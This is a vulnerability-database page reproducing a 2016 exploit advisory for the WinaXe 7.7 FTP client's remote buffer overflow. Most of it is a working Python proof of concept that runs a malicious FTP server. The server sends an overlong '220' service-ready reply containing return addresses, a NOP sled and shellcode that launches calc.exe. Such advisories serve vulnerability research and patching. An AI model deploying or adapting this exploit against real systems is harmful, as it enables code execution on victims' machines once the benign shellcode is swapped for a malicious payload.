Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WinaXe 7.7 'FTP client' - Remote Buffer Overflow Exploit

🗓️ 03 Nov 2016 00:00:00Reported by hyp3rlinxType 
zdt
 zdt🔗 0day.today👁 29 Views

WinaXe v7.7 FTP client Remote Buffer Overflow Exploi

Code
[+] Credits: John Page aka hyp3rlinx
 
 
Vendor:
============
www.labf.com
 
 
 
Product:
================
WinaXe v7.7 FTP 
 
The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package.
All that you need to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.
 
 
 
Vulnerability Type:
=======================
Remote Buffer Overflow
 
 
 
Vulnerability Details:
======================
 
WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server and
receiving overly long payloads in the command response from the remote server.
 
220 SERVICE READY 
331 USER / PASS
200 TYPE
257 PWD
 
etc...
 
below is POC for "server ready" 220 command exploit when first connecting to a FTP server.
 
 
Exploit code(s):
===============
 
import socket,struct
 
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
 
 
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
 
 
eip=struct.pack('<L',0x68084A6F)    #POP ECX RET 
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
 
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
 
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20     #Server Ready '220' Exploit
 
port = 21                  
s = socket.socket()
host = '127.0.0.1'             
s.bind((host, port))            
s.listen(5)                    
 
print 'Evil FTPServer listening...'
 
while True:
    conn, addr = s.accept()     
    conn.send('220'+payload+'\r\n')
    conn.close()

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Nov 2016 00:00Current
7.1High risk
Vulners AI Score7.1
winaxeftpremote buffer overflowexploitsecurity vulnerabilityftp client
29